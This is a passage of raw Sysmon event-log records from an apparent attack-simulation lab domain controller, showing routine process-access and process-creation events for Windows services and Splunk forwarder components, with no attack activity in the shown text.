13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.079{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.407{59A5CD1D-910B-6005-7201-00000000A301}36564076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\